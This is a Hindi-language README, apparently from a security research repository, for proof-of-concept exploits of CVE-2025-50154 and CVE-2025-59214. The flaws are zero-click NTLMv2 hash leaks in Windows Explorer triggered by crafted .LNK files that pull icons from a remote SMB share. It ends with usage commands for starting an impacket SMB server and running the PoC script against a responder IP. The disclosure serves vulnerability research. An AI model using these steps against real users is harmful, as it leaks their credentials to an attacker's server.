
CVE-2025-50154 और CVE-2025-59214 के लिए POCs, विंडोज़ फ़ाइल एक्सप्लोरर में ज़ीरो-डे कमज़ोरियाँ, जो उपयोगकर्ता सहभागिता के बिना NTLMv2-SSP का खुलासा करती हैं। यह CVE-2025-24054 सुरक्षा पैच के लिए एक बायपास है।
द्वारा Ruben Enkaoua और Cymulate
पहला ब्लॉग: ज़ीरो क्लिक, एक NTLM: माइक्रोसॉफ्ट सुरक्षा पैच बाइपास (CVE-2025-50154)
दूसरा ब्लॉग: दो बार पैच किया गया, फिर भी बाइपास: नया NTLM लीक (CVE-2025-50154 पैच बाइपास)
मूल भेद्यता, जिसे हाल ही में पैच किया गया था, एक 0-क्लिक NTLM हैश प्रकटीकरण था जो तब ट्रिगर हुआ जब explorer.exe ने .LNK शॉर्टकट फ़ाइल का आइकन प्रस्तुत किया जिसका आइकन एक दूरस्थ SMB सर्वर पर होस्ट किया गया था।
पैच के बाद, explorer.exe अब दूरस्थ SMB पथों से आइकन लोड नहीं करता है, जिससे NTLM हैश का स्वचालित प्रकटीकरण रुक जाता है।
अद्यतन: CVE-2025-50154 के लिए पैच बिल्कुल काम नहीं आया। हमने इसकी सूचना दी, और भेद्यता के लिए एक नया CVE निर्दिष्ट किया गया: CVE-2025-59214। POC दोनों CVE के लिए प्रासंगिक है।
इस प्रकार एक .LNK फ़ाइल तैयार करके:
explorer.exe प्रक्रिया अभी भी अपने RT_GROUP_ICON और RT_ICON संसाधनों से PE आइकन निकालने के लिए दूरस्थ फ़ाइल को लाएगी।

# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"